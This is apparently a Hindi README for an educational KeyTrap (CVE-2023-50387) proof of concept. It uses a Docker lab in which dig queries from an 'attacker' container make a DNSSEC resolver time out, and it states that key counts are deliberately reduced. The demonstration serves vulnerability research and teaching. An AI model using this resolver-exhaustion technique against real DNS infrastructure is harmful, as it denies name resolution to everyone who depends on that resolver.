
DNSSEC KeyTrap भेद्यता (CVE-2023-50387) के लिए शैक्षणिक प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें DNS रिज़ॉल्वरों पर एल्गोरिदमिक जटिलता हमलों को प्रदर्शित करने के लिए Docker-आधारित लैब वातावरण शामिल है।
DNS में KeyTrap (CVE-2023-50387)
यह रिपॉजिटरी शैक्षणिक उद्देश्यों के लिए है। वास्तविक हमलों में उपयोग को रोकने के लिए कुंजियों और हस्ताक्षरों की संख्या जानबूझकर कम रखी गई है, और एक-दूसरे से टकराने वाली कुंजियाँ उत्पन्न करने के लिए एक स्क्रिप्ट शामिल नहीं है।

$ docker compose up --build
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test. IN A
;; ANSWER SECTION:
a.a.test. 86400 IN A 10.10.0.4
;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE rcvd: 53
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached